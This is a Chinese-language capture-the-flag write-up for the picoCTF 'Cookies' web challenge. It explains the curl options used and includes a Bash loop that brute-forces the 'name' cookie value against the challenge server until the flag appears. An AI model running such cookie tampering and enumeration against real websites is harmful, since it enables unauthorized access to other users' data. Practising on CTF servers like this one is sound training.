PicoCTF - Cookies
題目:
誰不愛Cookies? 找出最好的那一個餅乾
-
進入頁面後看到
直接輸入 “snickerdoodle” 觀察 Cookies 數值變化
-
觀察到 Cookies 的數值從 -1 變為 0
-
改成 1 後 /check 底下重新整理後變為 Chocolate Clip cookies
解題
這題目唯一的變數就是 name 的值 , 而增加值會跑出不同總類的餅乾 , 題目說要找出最好的餅乾 , 所以這邊我使用 Brute force 來看能不能取得其他資料
使用工具 Curl
參數
- -H 添加 HTTP 請求的 HEAD
- -s 不輸出錯誤和進度訊息
- -L 讓 Curl 隨著伺服器重定向
- 向目標發出 HEAD 請求 , 並且把 HEAD打印出來
使用 Bash 寫個簡單的腳本來自動過濾結果
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| for i in {1..20};
do
con=$(curl -s http://mercury.picoctf.net:29649/ -H "Cookie: name=$i; Path=/" -L)
if ! echo "$con" | grep -q "Not very special"; then
#grep -q 用來找尋是否出現該字串 , 找到的話為 True , 由於有這段話代表說尚未找尋到有用的資料 , 所以 if !會反轉輸出結果為 False 以便執行 then後面的語句
echo "Cookie $i is special"
echo $con | grep "pico"
break
fi
done
|
最後輸出得到結果為
所需知識
- 編輯自動化腳本 如Bash,Python etc…
- 網站請求相關知識 如:HEAD,POST,重定向 etc…
- Linux指令熟悉 如 grep
通靈
